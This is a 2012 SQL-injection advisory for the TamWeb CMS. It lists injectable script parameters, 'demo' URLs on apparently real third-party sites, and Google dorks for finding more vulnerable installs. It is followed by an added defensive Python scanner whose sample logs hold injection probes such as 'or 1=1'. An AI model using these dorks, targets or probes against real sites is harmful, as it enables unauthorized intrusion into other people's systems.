TamWeb suffers from a remote SQL injection vulnerability.
011fd04e6063ea16d2bd2938205d4f0fa4b6d50ef1d83fbcf1ad329946358d61
==================================================================================================
# [~] Exploit Title: TamWeb SQL Injection Bugs #
# [~] Google Dorks : " Bottom Of The Exploits " #
# [~] Date: 09/09/2012 (Su) #
# [~] Exploit Author: Samim.s #
# [~] Version: ALL Versions #
# [~] Tested on: Se7en & BT5 #
# [~] Support WebSite : TamWeb.ir #
==================================================================================================
# [+] SQLi Exploits : #
# http://WebSite.Com/[path]/content.asp?type=[SQLi] #
# http://WebSite.Com/[path]/cat.asp?cat_id=[SQLi] #
# http://WebSite.Com/[path]/link_preview.php?page_id=[SQLi] #
# ---------------------------------------------------------------------------------------------- #
# [+] Demos : #
# http://www.tavanir.org.ir/link_preview.php?page_id=[SQLi] #
# http://www.dr-shadabi.ir/cat.asp?cat_id=[SQLi] #
# http://www.aria-atsez.com/content.asp?type=[SQLi] #
# ---------------------------------------------------------------------------------------------- #
# [+] Dorks : #
# inurl:"content.asp?type=" #
# inurl:"cat.asp?cat_id=" #
# inurl:"link_preview.php?page_id=" #
==================================================================================================
# [*] GreetZ To: Mr.XpR - UnknowN - Mr.EBI - SaMaN.BiLiZ & All IRaNHaCK Member + Iranian HaCkerZ #
==================================================================================================
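
For defenders running TamWeb, an added example (not part of the original advisory) that scans web-server access logs for requests to the three scripts listed above whose parameter value is anything other than a short alphanumeric token. The allow-list pattern is an assumption about what legitimate values look like, and the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Script -> parameter pairs named in the advisory.
WATCHED = {
    "content.asp": "type",
    "cat.asp": "cat_id",
    "link_preview.php": "page_id",
}

# Assumption: legitimate values are short alphanumeric tokens (ids or type names).
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")

# Request field of Common/Combined Log Format: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (client_ip, script, param, decoded_value) for each out-of-pattern value."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qs percent-decodes values; keys are lowercased because
        # query-string names are matched case-insensitively here.
        query = {k.lower(): v for k, v in parse_qs(url.query, keep_blank_values=True).items()}
        for value in query.get(param, []):
            if not SAFE_VALUE.fullmatch(value):
                hits.append((line.split(" ", 1)[0], script, param, value))
    return hits


# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Sep/2012:10:00:01 +0000] "GET /site/cat.asp?cat_id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Sep/2012:10:00:05 +0000] "GET /site/cat.asp?cat_id=12%27 HTTP/1.1" 500 310',
    '198.51.100.7 - - [09/Sep/2012:10:00:09 +0000] "GET /link_preview.php?page_id=3+or+1%3D1 HTTP/1.1" 200 4096',
    '192.0.2.10 - - [09/Sep/2012:10:00:12 +0000] "GET /content.asp?type=news HTTP/1.1" 200 2048',
    '203.0.113.4 - - [09/Sep/2012:10:00:20 +0000] "GET /index.asp?q=it%27s HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*suspicious_requests(SAMPLE_LOG), sep="\n")
```

Hits from this scan are leads for review, not proof of compromise; the same allow-list check, enforced server-side together with parameterized queries, is what actually closes the injection point.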